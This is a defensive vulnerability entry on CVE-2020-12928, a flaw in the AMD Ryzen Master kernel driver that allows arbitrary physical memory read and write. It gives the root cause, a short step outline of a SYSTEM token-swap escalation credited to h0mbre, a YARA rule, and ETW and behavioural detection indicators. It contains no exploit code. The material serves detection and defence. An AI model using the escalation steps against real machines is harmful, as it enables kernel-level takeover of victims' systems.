CVE-2020-12928
AMD Ryzen Master — arbitrary physical memory read/write via IOCTL
Summary
| Field | Value |
|---|---|
| Driver | AMDRyzenMasterDriver.sys |
| Vendor | AMD |
| Vulnerability Class | Arbitrary R/W / Physical Memory Mapping |
| Abused Version | Versions prior to 2.2.0.0 |
| Status | Patched — updated driver removes unrestricted memory access IOCTLs |
| Exploited ITW | No |
BYOVD Context
- Driver signing: Authenticode-signed by Advanced Micro Devices with valid certificate
- Vulnerable Driver Blocklist: Older versions included in Microsoft's recommended driver block rules
- HVCI behavior: Older versions blocked on HVCI-enabled systems
- KDU integration: Not integrated
- LOLDrivers: Listed at loldrivers.io
Affected IOCTLs
- Arbitrary physical memory read via MmMapIoSpace
- Arbitrary physical memory write via MmMapIoSpace
Root Cause
AMDRyzenMasterDriver.sys is the kernel component of AMD Ryzen Master, a CPU overclocking and monitoring utility for AMD Ryzen processors. The driver exposes IOCTLs for physical memory access via MmMapIoSpace to support hardware register manipulation for CPU tuning. However, the physical address parameter is entirely user-controlled with no range validation, allowing mapping of any physical address — not just AMD CPU-specific registers.
h0mbre published a detailed writeup documenting the discovery process, reverse engineering of the IOCTL dispatch, and complete exploitation to SYSTEM privilege escalation.
Exploitation
h0mbre's exploitation approach:
- Load the
AMDRyzenMasterDriver.sysdriver - Open the device handle
- Use the physical memory read IOCTL to traverse page tables
- Locate the EPROCESS structure for the current process and SYSTEM process
- Use the physical memory write IOCTL to copy the SYSTEM token to the current process
- The process now runs as SYSTEM
The writeup demonstrates a clean, methodical exploitation of the physical memory mapping primitive.
Detection
YARA Rule
rule CVE_2020_12928_AMDRyzenMaster {
meta:
description = "Detects vulnerable AMD Ryzen Master driver"
cve = "CVE-2020-12928"
author = "KernelSight"
severity = "high"
strings:
$mz = { 4D 5A }
$driver_name = "AMDRyzenMasterDriver" wide ascii nocase
$amd = "Advanced Micro Devices" wide ascii
$ryzen = "RyzenMaster" wide ascii nocase
condition:
$mz at 0 and ($driver_name or $ryzen) and $amd
}
ETW Indicators
| Provider | Event / Signal | Relevance |
|---|---|---|
| Microsoft-Windows-Kernel-File | Driver load event | Detects loading of AMDRyzenMasterDriver.sys |
| Sysmon | Event ID 6 — Driver loaded | Hash and signature capture |
| Microsoft-Windows-Security-Auditing | Event 4697 — Service installed | Driver service creation |
| Microsoft-Windows-Kernel-Process | Process token modification | Post-exploitation token swap |
Behavioral Indicators
- Loading of older
AMDRyzenMasterDriver.sysversions (pre-2.2.0.0) outside AMD Ryzen Master installation - Physical memory mapping IOCTLs targeting non-CPU-register physical addresses
- Page table traversal patterns in physical memory read sequences
- Privilege escalation following AMD driver interaction